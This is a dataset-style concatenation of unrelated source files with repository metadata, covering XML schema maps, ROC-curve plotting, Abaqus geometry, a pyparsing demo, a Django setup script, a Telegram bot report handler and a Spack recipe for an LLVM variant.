obj.namespaces.update(self.namespaces)
obj.types.update(self.types)
obj.attributes.update(self.attributes)
obj.attribute_groups.update(self.attribute_groups)
obj.groups.update(self.groups)
obj.notations.update(self.notations)
obj.elements.update(self.elements)
obj.substitution_groups.update(self.substitution_groups)
obj.constraints.update(self.constraints)
return obj
__copy__ = copy
def lookup_notation(self, qname):
return lookup_notation(self.notations, qname, self.validator.TAG_MAP)
def lookup_type(self, qname):
return lookup_type(self.types, qname, self.validator.TAG_MAP)
def lookup_attribute(self, qname):
return lookup_attribute(self.attributes, qname, self.validator.TAG_MAP)
def lookup_attribute_group(self, qname):
return lookup_attribute_group(self.attribute_groups, qname, self.validator.TAG_MAP)
def lookup_group(self, qname):
return lookup_group(self.groups, qname, self.validator.TAG_MAP)
def lookup_element(self, qname):
return lookup_element(self.elements, qname, self.validator.TAG_MAP)
@property
def built(self):
if not self.namespaces:
return False
xsd_global = None
for xsd_global in self.iter_globals():
if not isinstance(xsd_global, XsdComponent):
return False
if not xsd_global.built:
return False
if xsd_global is not None:
return True
else:
return False
@property
def validation_attempted(self):
if self.built:
return 'full'
elif any([schema.validation_attempted == 'partial' for schema in self.iter_schemas()]):
return 'partial'
else:
return 'none'
@property
def validity(self):
if not self.namespaces:
return False
if all(schema.validity == 'valid' for schema in self.iter_schemas()):
return 'valid'
elif any(schema.validity == 'invalid' for schema in self.iter_schemas()):
return 'invalid'
else:
return 'notKnown'
@property
def resources(self):
return [(schema.url, schema) for schemas in self.namespaces.values() for schema in schemas]
def iter_components(self, xsd_classes=None):
if xsd_classes is None or isinstance(self, xsd_classes):
yield self
for xsd_global in self.iter_globals():
for obj in xsd_global.iter_components(xsd_classes):
yield obj
def iter_schemas(self):
"""Creates an iterator for the schemas registered in the instance."""
for ns_schemas in self.namespaces.values():
for schema in ns_schemas:
yield schema
def iter_globals(self):
"""
Creates an iterator for XSD global definitions/declarations.
"""
for global_map in self.global_maps:
for obj in global_map.values():
yield obj
def register(self, schema):
"""
Registers an XMLSchema instance.
"""
try:
ns_schemas = self.namespaces[schema.target_namespace]
except KeyError:
self.namespaces[schema.target_namespace] = [schema]
else:
if schema in ns_schemas:
return
if not any([schema.url == obj.url for obj in ns_schemas]):
ns_schemas.append(schema)
def clear(self, remove_schemas=False, only_unbuilt=False):
"""
Clears the instance maps and schemas.
:param remove_schemas: removes also the schema instances.
:param only_unbuilt: removes only not built objects/schemas.
"""
if only_unbuilt:
not_built_schemas = {schema for schema in self.iter_schemas() if not schema.built}
if not not_built_schemas:
return
for global_map in self.global_maps:
for k in list(global_map.keys()):
obj = global_map[k]
if not isinstance(obj, XsdComponent) or obj.schema in not_built_schemas:
del global_map[k]
if k in self.substitution_groups:
del self.substitution_groups[k]
if k in self.constraints:
del self.constraints[k]
if remove_schemas:
namespaces = NamespaceResourcesMap()
for uri, value in self.namespaces.items():
for schema in value:
if schema not in not_built_schemas:
namespaces[uri] = schema
self.namespaces = namespaces
else:
for global_map in self.global_maps:
global_map.clear()
self.substitution_groups.clear()
self.constraints.clear()
if remove_schemas:
self.namespaces.clear()
def build(self):
"""
Update the global maps adding the global not built registered schemas.
"""
try:
meta_schema = self.namespaces[XSD_NAMESPACE][0]
except KeyError:
raise XMLSchemaValueError("%r: %r namespace is not registered." % (self, XSD_NAMESPACE))
not_built_schemas = [schema for schema in self.iter_schemas() if not schema.built]
for schema in not_built_schemas:
schema._root_elements = None
# Load and build global declarations
load_xsd_notations(self.notations, not_built_schemas)
load_xsd_simple_types(self.types, not_built_schemas)
load_xsd_attributes(self.attributes, not_built_schemas)
load_xsd_attribute_groups(self.attribute_groups, not_built_schemas)
load_xsd_complex_types(self.types, not_built_schemas)
load_xsd_elements(self.elements, not_built_schemas)
load_xsd_groups(self.groups, not_built_schemas)
if not meta_schema.built:
xsd_builtin_types_factory(meta_schema, self.types)
for qname in self.notations:
self.lookup_notation(qname)
for qname in self.attributes:
self.lookup_attribute(qname)
for qname in self.attribute_groups:
self.lookup_attribute_group(qname)
for qname in self.types:
self.lookup_type(qname)
for qname in self.elements:
self.lookup_element(qname)
for qname in self.groups:
self.lookup_group(qname)
# Builds element declarations inside model groups.
element_class = meta_schema.BUILDERS.element_class
for schema in not_built_schemas:
for group in schema.iter_components(XsdGroup):
for k in range(len(group)):
if isinstance(group[k], tuple):
elem, schema = group[k]
group[k] = element_class(elem, schema, group)
for schema in not_built_schemas:
# Build substitution groups from global element declarations
for xsd_element in schema.elements.values():
if xsd_element.substitution_group:
qname = prefixed_to_qname(xsd_element.substitution_group, xsd_element.schema.namespaces)
if xsd_element.type.name == XSD_ANY_TYPE and 'type' not in xsd_element.elem.attrib:
xsd_element.type = self.elements[qname].type
try:
self.substitution_groups[qname].add(xsd_element)
except KeyError:
self.substitution_groups[qname] = {xsd_element}
if schema.meta_schema is not None:
# Set referenced key/unique constraints for keyrefs
for constraint in schema.iter_components(XsdKeyref):
constraint.parse_refer()
# Check for illegal restrictions
# TODO: Fix for XsdGroup.is_restriction() method is needed before enabling this check
# if schema.validation != 'skip':
# for xsd_type in schema.iter_components(XsdComplexType):
# xsd_type.check_restriction()
if self.validation == 'strict' and not self.built:
raise XMLSchemaNotBuiltError(self, "global map %r not built!" % self)
| 39.763158
| 110
| 0.623248
|
f447193318e57cff7fedcdd94df2bd45b6e41805
| 3,229
|
py
|
Python
|
abroca/utils.py
|
VaibhavKaushik3220/abroca
|
6dd11e83c089798738cfe2532716ba8585d1292a
|
[
"MIT"
] | null | null | null |
abroca/utils.py
|
VaibhavKaushik3220/abroca
|
6dd11e83c089798738cfe2532716ba8585d1292a
|
[
"MIT"
] | null | null | null |
abroca/utils.py
|
VaibhavKaushik3220/abroca
|
6dd11e83c089798738cfe2532716ba8585d1292a
|
[
"MIT"
] | 2
|
2020-10-27T00:54:34.000Z
|
2021-08-16T17:37:39.000Z
|
import numpy as np
import sklearn.metrics as metrics
from scipy import interpolate
import matplotlib.pyplot as plt
def compute_roc(y_scores, y_true):
"""
Function to compute the Receiver Operating Characteristic (ROC) curve for a set of predicted probabilities and the true class labels.
y_scores - vector of predicted probability of being in the positive class P(X == 1) (numeric)
y_true - vector of true labels (numeric)
Returns FPR and TPR values
"""
fpr, tpr, _ = metrics.roc_curve(y_true, y_scores)
return fpr, tpr
def compute_auc(y_scores, y_true):
"""
Function to Area Under the Receiver Operating Characteristic Curve (AUC)
y_scores - vector of predicted probability of being in the positive class P(X == 1) (numeric)
y_true - vector of true labels (numeric)
Returns AUC value
"""
auc = metrics.roc_auc_score(y_true, y_scores)
return auc
def interpolate_roc_fun(fpr, tpr, n_grid):
"""
Function to Use interpolation to make approximate the Receiver Operating Characteristic (ROC) curve along n_grid equally-spaced values.
fpr - vector of false positive rates computed from compute_roc
tpr - vector of true positive rates computed from compute_roc
n_grid - number of approximation points to use (default value of 10000 more than adequate for most applications) (numeric)
Returns a list with components x and y, containing n coordinates which interpolate the given data points according to the method (and rule) desired
"""
roc_approx = interpolate.interp1d(x=fpr, y=tpr)
x_new = np.linspace(0, 1, num=n_grid)
y_new = roc_approx(x_new)
return x_new, y_new
def slice_plot(
majority_roc_fpr,
minority_roc_fpr,
majority_roc_tpr,
minority_roc_tpr,
majority_group_name="baseline",
minority_group_name="comparison",
fout="./slice_plot.png",
):
"""
Function to create a 'slice plot' of two roc curves with area between them (the ABROCA region) shaded.
majority_roc_fpr, minority_roc_fpr - FPR of majority and minority groups
majority_roc_tpr, minority_roc_tpr - TPR of majority and minority groups
majority_group_name - (optional) - majority group display name on the slice plot
minority_group_name - (optional) - minority group display name on the slice plot
fout - (optional) - File name (including directory) to save the slice plot generated
No return value; displays slice plot & file is saved to disk
"""
plt.figure(1, figsize=(6, 5))
plt.title("ABROCA - Slice Plot")
plt.xlabel("False Positive Rate")
plt.ylabel("True Positive Rate")
plt.plot(
majority_roc_fpr,
majority_roc_tpr,
label="{o} - Baseline".format(o=majority_group_name),
linestyle="-",
color="r",
)
plt.plot(
minority_roc_fpr,
minority_roc_tpr,
label="{o} - Comparison".format(o=minority_group_name),
linestyle="-",
color="b",
)
plt.fill(
majority_roc_fpr.tolist() + np.flipud(minority_roc_fpr).tolist(),
majority_roc_tpr.tolist() + np.flipud(minority_roc_tpr).tolist(),
"y",
)
plt.legend()
plt.savefig(fout)
plt.show()
| 35.877778
| 153
| 0.697739
|
7ce14303119b354dc73b4af2b1bf742cb03d8d78
| 13,873
|
py
|
Python
|
f3dasm/abaqus/geometry/shapes.py
|
bessagroup/F3DASM
|
916f706f4f206c59cb53b9116660d3a194755c33
|
[
"BSD-3-Clause"
] | 26
|
2020-11-26T14:35:25.000Z
|
2022-02-24T14:00:27.000Z
|
f3dasm/abaqus/geometry/shapes.py
|
yuanquan010/F3DASM
|
1919caf53338534963fb25f76c417fd10ab7628f
|
[
"BSD-3-Clause"
] | 19
|
2021-02-28T16:06:30.000Z
|
2022-03-12T01:02:29.000Z
|
f3dasm/abaqus/geometry/shapes.py
|
yuanquan010/F3DASM
|
1919caf53338534963fb25f76c417fd10ab7628f
|
[
"BSD-3-Clause"
] | 8
|
2020-10-09T19:10:13.000Z
|
2022-03-10T16:26:50.000Z
|
'''
Created on 2020-10-15 09:36:46
Last modified on 2020-11-26 12:49:39
@author: L. F. Pereira (lfpereira@fe.up.pt))
'''
# imports
# abaqus
from caeModules import * # allow noGui
from abaqusConstants import (DEFORMABLE_BODY, THREE_D, ON, COUNTERCLOCKWISE,
CLOCKWISE, YZPLANE, XYPLANE, XZPLANE, SIDE1, LINE)
# standard library
import copy
from abc import ABCMeta
import math
# local library
from .base import Geometry
# abstract object
class MicroShape(Geometry):
__metaclass__ = ABCMeta
def __init__(self, name, material=None, default_mesh=False):
super(MicroShape, self).__init__(default_mesh=default_mesh)
self.name = name
self.material = material
def draw_in_sketch(self, sketch):
'''
Perform operations in main sketch.
'''
pass
def make_partition(self, model, tmp_part):
pass
class PeriodicBall(MicroShape):
__metaclass__ = ABCMeta
def __init__(self, name, r, center, tol=1e-4, bounds=None, material=None):
super(PeriodicBall, self).__init__(name, material, default_mesh=False)
self.r = r
self.tol = tol
self.bounds = bounds
# initialize variables
self.particles = []
# create required particles
self.add_center(center)
def _center_exists(self, cmp_center):
exists = False
d = len(cmp_center)
for particle in self.particles:
center = particle.center
k = 0
for elem_center, elem_cmpcenter in zip(center, cmp_center):
if abs(elem_center - elem_cmpcenter) < self.tol:
k += 1
if k == d:
exists = True
break
return exists
def _is_inside(self, center):
dist_squared = self.r**2
for (c, bounds) in zip(center, self.bounds):
if c < bounds[0]:
dist_squared -= (c - bounds[0])**2
elif c > bounds[1]:
dist_squared -= (c - bounds[1])**2
return dist_squared > 0
def add_center(self, center):
if self._center_exists(center) or (self.bounds is not None and not self._is_inside(center)):
return
else:
self._add_particle(center)
for i, (pos_center, bounds) in enumerate(zip(center, self.bounds)):
dim = bounds[1] - bounds[0]
if (pos_center + self.r) > bounds[1]:
new_center = copy.copy(center)
new_center[i] -= dim
self.add_center(new_center)
elif (pos_center - self.r) < bounds[0]:
new_center = copy.copy(center)
new_center[i] += dim
self.add_center(new_center)
def _get_name(self):
return '{}_{}'.format(self.name, len(self.particles))
# concrete shapes
class PeriodicSphere(PeriodicBall):
def _add_particle(self, center):
name = self._get_name()
self.particles.append(Sphere(name=name, r=self.r, center=center, tol=self.tol,
bounds=self.bounds, material=self.material))
def create_part(self, model):
parts = []
for particle in self.particles:
parts.append(particle.create_part(model))
return parts
def create_instance(self, model):
instances = []
for particle in self.particles:
instances.append(particle.create_instance(model))
return instances
def generate_mesh(self):
for particle in self.particles:
particle.generate_mesh()
class PeriodicCircle(PeriodicBall):
def _add_particle(self, center):
name = self._get_name()
self.particles.append(Circle(name=name, r=self.r, center=center,
tol=self.tol, bounds=self.bounds,
material=self.material))
def draw_in_sketch(self, sketch):
for particle in self.particles:
particle.draw_in_sketch(sketch)
def make_partition(self, model, tmp_part):
# verification
if self.material is None:
return False
# create partitions
for particle in self.particles:
particle.make_partition(model, tmp_part)
return True
def get_region(self, tmp_part):
return [particle.get_region(tmp_part) for particle in self.particles]
class Sphere(MicroShape):
def __init__(self, r, center, tol=1e-4, name='SPHERE',
bounds=(), material=None):
'''
Parameters
----------
bounds : array-like e.g. ((x_min, x_max), (y_min, y_max))
Bounds of the e.g. RVE. Sphere is cutted to be contained within
bounds.
'''
super(Sphere, self).__init__(name, material)
self.r = r
self.center = center
self.tol = tol
self.bounds = bounds
def create_part(self, model):
# sketch
sketch = self._create_sketch(model)
# part
self.part = model.Part(name=self.name, dimensionality=THREE_D,
type=DEFORMABLE_BODY)
self.part.BaseSolidRevolve(sketch=sketch, angle=360.,)
# partitions for meshing
self._create_partitions()
# remove cells
if self._is_to_remove_cells():
self._remove_cells()
# assign section
if self.material is not None:
self._assign_section(region=(self.part.cells,))
return self.part
def _create_sketch(self, model):
a, b = self.center[1] + self.r, self.center[1] - self.r
# sketch
sketch = model.ConstrainedSketch(name=self.name + '_PROFILE',
sheetSize=2 * self.r)
sketch.ConstructionLine(point1=(self.center[0], self.r),
point2=(self.center[0], -self.r))
sketch.ArcByCenterEnds(center=self.center[:2],
point1=(self.center[0], a),
point2=(self.center[0], b), direction=CLOCKWISE)
sketch.Line(point1=(self.center[0], a), point2=(self.center[0], b))
return sketch
def create_instance(self, model):
instance = model.rootAssembly.Instance(name=self.name,
part=self.part, dependent=ON)
instance.translate(vector=(0., 0., self.center[2]))
return instance
def _create_partitions(self):
planes = [YZPLANE, XZPLANE, XYPLANE]
for c, plane in zip(self.center, planes):
offset = c if plane is not XYPLANE else 0.
feature = self.part.DatumPlaneByPrincipalPlane(principalPlane=plane,
offset=offset)
datum = self.part.datums[feature.id]
self.part.PartitionCellByDatumPlane(datumPlane=datum, cells=self.part.cells)
def _is_to_remove_cells(self):
for bounds, c in zip(self.bounds, self.center):
if c - self.r < bounds[0] or c + self.r > bounds[1]:
return True
return False
def _remove_cells(self,):
# initialization
planes = [YZPLANE, XZPLANE, XYPLANE]
variables = ['x', 'y', 'z']
# delete cells
for i in range(3):
# partition position
if (self.center[i] + self.r) > self.bounds[i][1]:
sign = 1
elif (self.center[i] - self.r) < self.bounds[i][0]:
sign = -1
else:
continue
# partition by datum
if sign > 0:
x_max = self.bounds[i][1] if i != 2 else self.bounds[i][1] - self.center[i]
else:
x_max = self.bounds[i][0] if i != 2 else self.bounds[i][0] - self.center[i]
feature = self.part.DatumPlaneByPrincipalPlane(principalPlane=planes[i],
offset=x_max)
datum = self.part.datums[feature.id]
try:
self.part.PartitionCellByDatumPlane(datumPlane=datum, cells=self.part.cells)
except: # in case partition already exists
pass
var_name = '{}Max'.format(variables[i]) if sign == -1 else '{}Min'.format(variables[i])
kwargs = {var_name: x_max}
faces = self.part.faces.getByBoundingBox(**kwargs)
faces_to_delete = []
for face in faces:
if abs(face.getNormal()[i]) != 1.0 or (sign == 1 and face.pointOn[0][i] - self.tol > x_max) or (sign == -1 and face.pointOn[0][i] + self.tol < x_max):
faces_to_delete.append(face)
# remove faces
try:
self.part.RemoveFaces(faceList=faces_to_delete, deleteCells=False)
except: # in case faces where already removed
pass
class Circle(MicroShape):
def __init__(self, r, center, tol=1e-4, name='CIRCLE', bounds=(), material=None):
'''
Parameters
----------
bounds : array-like e.g. ((x_min, x_max), (y_min, y_max))
Bounds of the e.g. RVE. Sphere is cutted to be contained within
bounds.
'''
super(Circle, self).__init__(name, material)
self.r = r
self.center = center
self.tol = tol
self.bounds = bounds
def draw_in_sketch(self, sketch):
# verification
if self.material is not None:
return
# draw in sketch
if self._is_to_remove_cells():
self._draw_partial_arc(sketch)
else:
self._draw_circle(sketch)
def _draw_circle(self, sketch):
pt = (self.center[0] + self.r, self.center[1])
sketch.CircleByCenterPerimeter(center=self.center, point1=pt)
def _draw_partial_arc(self, sketch):
'''
Notes
-----
Vertices cannot be cut (otherwise it will mess the application of the
boundary conditions).
'''
# get intersection points
inter_pts = self._get_intersection_pts()
# find right points order
if inter_pts[0][0] == self.bounds[0][0] or inter_pts[0][1] == self.bounds[1][1]:
inter_pts[0], inter_pts[1] = inter_pts[1], inter_pts[0]
# draw circle
arc = sketch.ArcByCenterEnds(center=self.center, point1=inter_pts[0],
point2=inter_pts[1],
direction=COUNTERCLOCKWISE)
# create breakpoints
for pt in inter_pts:
# find line (findAt sometimes finds ARC)
geom = [g for g in sketch.geometry.values() if g.curveType == LINE]
for g in geom:
vertices = g.getVertices()
v1, v2 = vertices[0].coords, vertices[1].coords
index = 1 if v1[0] == v2[0] else 0
cpl_index = 0 if v1[0] == v2[0] else 1
lv, rv = min(v1[index], v2[index]), max(v1[index], v2[index])
if pt[cpl_index] == v1[cpl_index] and lv <= pt[index] <= rv:
line = g
break
# break line
sketch.breakCurve(curve1=line, curve2=arc, point1=pt, point2=pt)
# delete curves
geom = [g for g in sketch.geometry.values() if g.curveType == LINE]
for g in geom:
v1, v2 = g.getVertices()
if v1.coords in inter_pts and v2.coords in inter_pts:
sketch.delete((g,))
break
def _is_to_remove_cells(self):
for bounds, c in zip(self.bounds, self.center):
if c - self.r < bounds[0] or c + self.r > bounds[1]:
return True
return False
def _get_intersection_pts(self):
# initialization
xc, yc = self.center
pts = []
# in vertical edges
for x in self.bounds[0]:
aux = self.r**2 - (x - xc)**2
if aux >= 0.:
ys1 = math.sqrt(aux) + yc
ys2 = -math.sqrt(aux) + yc
if ys1 < self.bounds[1][1]:
pts.append((x, ys1))
if ys2 > self.bounds[1][0]:
pts.append((x, ys2))
# in horizontal edges
for y in self.bounds[1]:
aux = self.r**2 - (y - yc)**2
if aux >= 0.:
xs1 = math.sqrt(aux) + xc
xs2 = -math.sqrt(aux) + xc
if xs1 < self.bounds[0][1]:
pts.append((xs1, y))
if xs2 > self.bounds[0][0]:
pts.append((xs2, y))
return pts
def make_partition(self, model, part):
# verification
if self.material is None:
return False
# create sketch
face = part.faces[0]
transf_sketch = part.MakeSketchTransform(sketchPlane=face, sketchPlaneSide=SIDE1,
origin=[0., 0., 0.])
sketch = model.ConstrainedSketch(name=self.name, sheetSize=2 * self.r,
transform=transf_sketch)
# draw in sketch
pt = (self.center[0] + self.r, self.center[1])
sketch.CircleByCenterPerimeter(center=self.center, point1=pt)
# partition sketch
part.PartitionFaceBySketch(faces=part.faces, sketch=sketch)
# assign material
region = self.get_region(part)
self._assign_section(part=part, region=region)
return True
def get_region(self, part):
center1 = list(self.center) + [0.]
center2 = list(self.center) + [1.]
faces = part.faces.getByBoundingCylinder(center1, center2, self.r + self.tol)
return (faces[0],)
| 32.187935
| 166
| 0.545664
|
e07d5183b3541b3b52780f3901f00453b2744bb9
| 1,027
|
py
|
Python
|
pyparsing-2.0.1/examples/tagCapture.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | 1
|
2018-05-30T22:21:30.000Z
|
2018-05-30T22:21:30.000Z
|
pyparsing-2.0.1/examples/tagCapture.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
pyparsing-2.0.1/examples/tagCapture.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
#
# tagCapture.py
#
# Simple demo showing how to match HTML tags
#
from pyparsing import *
src = "this is test <b> bold <i>text</i> </b> normal text "
def matchingCloseTag(other):
ret = Forward()
ret << anyCloseTag.copy()
def setupMatchingClose(tokens):
opentag = tokens[0]
def mustMatch(tokens):
if tokens[0][0].strip('<>/') != opentag:
raise ParseException("",0,"")
ret.setParseAction(mustMatch)
other.addParseAction(setupMatchingClose)
return ret
for m in originalTextFor(anyOpenTag + SkipTo(matchingCloseTag(anyOpenTag),
include=True,
failOn=anyOpenTag) ).searchString(src):
print(m.dump())
for m in originalTextFor(anyOpenTag + SkipTo(matchingCloseTag(anyOpenTag),
include=True) ).searchString(src):
print(m.dump())
| 28.527778
| 86
| 0.525803
|
e0c11f2c1d45cab855f0407252cbaccae045d935
| 124
|
py
|
Python
|
utils/test.py
|
wisesky/LeetCode-Practice
|
65549f72c565d9f11641c86d6cef9c7988805817
|
[
"MIT"
] | null | null | null |
utils/test.py
|
wisesky/LeetCode-Practice
|
65549f72c565d9f11641c86d6cef9c7988805817
|
[
"MIT"
] | null | null | null |
utils/test.py
|
wisesky/LeetCode-Practice
|
65549f72c565d9f11641c86d6cef9c7988805817
|
[
"MIT"
] | null | null | null |
while True:
try:
s = input()
# s = 'haha'
print(s)
except :
# print(e)
break
| 15.5
| 20
| 0.370968
|
2128ea84c292055709931dd8ef57230bb9214ca9
| 1,269
|
py
|
Python
|
packages/django_weixin/setup.py
|
tolerious/django-weixin
|
18f3f2d5d8377c7dde8700afc5977861c8488b68
|
[
"MIT"
] | null | null | null |
packages/django_weixin/setup.py
|
tolerious/django-weixin
|
18f3f2d5d8377c7dde8700afc5977861c8488b68
|
[
"MIT"
] | null | null | null |
packages/django_weixin/setup.py
|
tolerious/django-weixin
|
18f3f2d5d8377c7dde8700afc5977861c8488b68
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
'''
Created on 04 11, 2016
@author: tolerious
'''
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst')) as readme:
README = readme.read()
# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))
setup(
name='django-weixin',
version='0.1.6',
packages=['django_weixin'],
include_package_data=True,
license='MIT License', # example license
description='A simple Django application to implementation Wechat API.',
long_description=README,
url='http://tobe.engineer/',
author='tolerious',
author_email='tolerious@qq.com',
classifiers=[
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License', # example license
'Operating System :: OS Independent',
'Programming Language :: Python',
# Replace these appropriately if you are stuck on Python 2.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
],
)
| 29.511628
| 78
| 0.639874
|
2940ef0d442b48b0431ab0435a056931cd3c447c
| 316
|
py
|
Python
|
testing/code/odf_tarball/examples/quick_write_gzip.py
|
ageller/iceCubeTest
|
1cf74f0f225c8ab60820835cc5eee49cad586277
|
[
"MIT"
] | null | null | null |
testing/code/odf_tarball/examples/quick_write_gzip.py
|
ageller/iceCubeTest
|
1cf74f0f225c8ab60820835cc5eee49cad586277
|
[
"MIT"
] | null | null | null |
testing/code/odf_tarball/examples/quick_write_gzip.py
|
ageller/iceCubeTest
|
1cf74f0f225c8ab60820835cc5eee49cad586277
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from event import Event
from fileio import write
import gzip
f = gzip.open("test.odf.gz","wb")
ev = Event()
ev.runID = 1009322
ev.year = 2007
ev.startTime = long(10908290809370)
ev.eventLength = 100000.
ev.triggers = [(10000.00,"BLEH")]
ev.hits = [(1.0,1000.4,100.,-100.,255.)]
write(f,ev)
| 17.555556
| 40
| 0.683544
|
ad0d0e8d19e6b022f1145654275f95354cf0f04d
| 816
|
py
|
Python
|
handlers/groups/report.py
|
jtprog/gendalf_bot
|
aebdaf52f9af3b1307eb1962b16d2e9fd04dd51f
|
[
"WTFPL"
] | null | null | null |
handlers/groups/report.py
|
jtprog/gendalf_bot
|
aebdaf52f9af3b1307eb1962b16d2e9fd04dd51f
|
[
"WTFPL"
] | 1
|
2021-09-12T17:38:29.000Z
|
2021-09-12T17:38:29.000Z
|
handlers/groups/report.py
|
jtprog/gendalf_bot
|
aebdaf52f9af3b1307eb1962b16d2e9fd04dd51f
|
[
"WTFPL"
] | null | null | null |
from aiogram import types
from aiogram.dispatcher.filters.builtin import Command
from loader import dp
from data.config import MASTER_ADMIN_ID
@dp.message_handler(Command(["report"]))
async def user_bot_help(message: types.Message):
"""
Отправка сообщения в чат и админу в личку о том, что кто-то мудак
"""
from_name = message.from_user.username
username = message.reply_to_message.from_user.username
text = [
f'Пользователь <a href="https://t.me/@{from_name}">{from_name}</a>\n',
f'Сказал что мудак у нас <a href="https://t.me/@{username}">{username}</a>',
]
await message.answer(text="\n".join(text), parse_mode=types.ParseMode.HTML)
await message.bot.send_message(
chat_id=MASTER_ADMIN_ID, text="\n".join(text), parse_mode=types.ParseMode.HTML
)
| 35.478261
| 86
| 0.702206
|
0af4a2b0f2f22747eef69233c80007ff63782781
| 20,411
|
py
|
Python
|
var/spack/repos/builtin/packages/llvm-doe/package.py
|
klevzoff/spack
|
396936d24173254ecf4148bc460702185e4c99e5
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2019-02-10T13:47:48.000Z
|
2019-04-17T13:05:17.000Z
|
var/spack/repos/builtin/packages/llvm-doe/package.py
|
klevzoff/spack
|
396936d24173254ecf4148bc460702185e4c99e5
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 17
|
2019-03-21T15:54:00.000Z
|
2022-03-29T19:34:28.000Z
|
var/spack/repos/builtin/packages/llvm-doe/package.py
|
klevzoff/spack
|
396936d24173254ecf4148bc460702185e4c99e5
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2018-04-06T09:04:11.000Z
|
2020-01-24T12:52:12.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import os.path
import re
import sys
import llnl.util.tty as tty
import spack.util.executable
class LlvmDoe(CMakePackage, CudaPackage):
"""This package provides a collection of the experimental LLVM projects done
by the US DOE research and development teams.
"""
homepage = "https://github.com/llvm-doe-org"
url = "https://github.com/llvm-doe-org/llvm-project/archive/llvmorg-10.0.0.zip"
git = "https://github.com/llvm-doe-org/llvm-project"
maintainers = ['shintaro-iwasaki']
version('doe', branch='doe', preferred=True)
version('upstream', branch='llvm.org/main')
version('bolt', branch='bolt/main')
version('clacc', branch='clacc/master')
version('pragma-clang-loop', branch='sollve/pragma-clang-loop')
version('pragma-omp-tile', branch='sollve/pragma-omp-tile')
# NOTE: The debug version of LLVM is an order of magnitude larger than
# the release version, and may take up 20-30 GB of space. If you want
# to save space, build with `build_type=Release`.
variant(
"clang",
default=True,
description="Build the LLVM C/C++/Objective-C compiler frontend",
)
variant(
"flang",
default=False,
description="Build the LLVM Fortran compiler frontend",
)
variant(
"omp_debug",
default=False,
description="Include debugging code in OpenMP runtime libraries",
)
variant("lldb", default=False, description="Build the LLVM debugger")
variant("lld", default=True, description="Build the LLVM linker")
variant("mlir", default=False, description="Build with MLIR support")
variant(
"internal_unwind",
default=True,
description="Build the libcxxabi libunwind",
)
variant(
"polly",
default=True,
description="Build the LLVM polyhedral optimization plugin, "
"only builds for 3.7.0+",
)
variant(
"libcxx",
default=True,
description="Build the LLVM C++ standard library",
)
variant(
"compiler-rt",
default=True,
description="Build LLVM compiler runtime, including sanitizers",
)
variant(
"gold",
default=(sys.platform != "darwin"),
description="Add support for LTO with the gold linker plugin",
)
variant(
"split_dwarf",
default=False,
description="Build with split dwarf information",
)
variant(
"shared_libs",
default=False,
description="Build all components as shared libraries, faster, "
"less memory to build, less stable",
)
variant(
"llvm_dylib",
default=False,
description="Build LLVM shared library, containing all "
"components in a single shared library",
)
variant(
"all_targets",
default=False,
description="Build all supported targets, default targets "
"<current arch>,NVPTX,AMDGPU,CppBackend",
)
variant(
"build_type",
default="Release",
description="CMake build type",
values=("Debug", "Release", "RelWithDebInfo", "MinSizeRel"),
)
variant(
"omp_tsan",
default=False,
description="Build with OpenMP capable thread sanitizer",
)
variant(
"argobots",
default=False,
description="Build BOLT/OpenMP with Argobots. Effective when @bolt",
)
variant('code_signing', default=False,
description="Enable code-signing on macOS")
variant("python", default=False, description="Install python bindings")
extends("python", when="+python")
# Build dependency
depends_on("cmake@3.4.3:", type="build")
depends_on("python", when="~python", type="build")
depends_on("pkgconfig", type="build")
# Universal dependency
depends_on("python", when="+python")
depends_on("z3")
# openmp dependencies
depends_on("perl-data-dumper", type=("build"))
depends_on("hwloc")
depends_on("libelf", when="+cuda") # libomptarget
depends_on("libffi", when="+cuda") # libomptarget
# ncurses dependency
depends_on("ncurses+termlib")
# lldb dependencies
depends_on("swig", when="+lldb")
depends_on("libedit", when="+lldb")
depends_on("py-six", when="+lldb +python")
# gold support, required for some features
depends_on("binutils+gold", when="+gold")
conflicts("+llvm_dylib", when="+shared_libs")
conflicts("+lldb", when="~clang")
conflicts("+libcxx", when="~clang")
conflicts("+internal_unwind", when="~clang")
conflicts("+compiler-rt", when="~clang")
conflicts("%gcc@:5.0.999")
# cuda_arch value must be specified
conflicts("cuda_arch=none", when="+cuda", msg="A value for cuda_arch must be specified.")
conflicts("+mlir")
conflicts("+flang", when="~clang")
# code signing is only necessary on macOS",
conflicts('+code_signing', when='platform=linux')
conflicts('+code_signing', when='platform=cray')
conflicts(
'+code_signing',
when='~lldb platform=darwin',
msg="code signing is only necessary for building the "
"in-tree debug server on macOS. Turning this variant "
"off enables a build of llvm with lldb that uses the "
"system debug server",
)
# LLVM bug https://bugs.llvm.org/show_bug.cgi?id=48234
# CMake bug: https://gitlab.kitware.com/cmake/cmake/-/issues/21469
# Fixed in upstream versions of both
conflicts('^cmake@3.19.0', when='@:11.0.0')
# Backport from llvm master + additional fix
# see https://bugs.llvm.org/show_bug.cgi?id=39696
# for a bug report about this problem in llvm master.
patch("constexpr_longdouble_9.0.patch", when="@9:10.0.0+libcxx")
# https://github.com/spack/spack/issues/19625,
# merged in llvm-11.0.0_rc2
patch("lldb_external_ncurses-10.patch", when="@10.0.0:10.99+lldb")
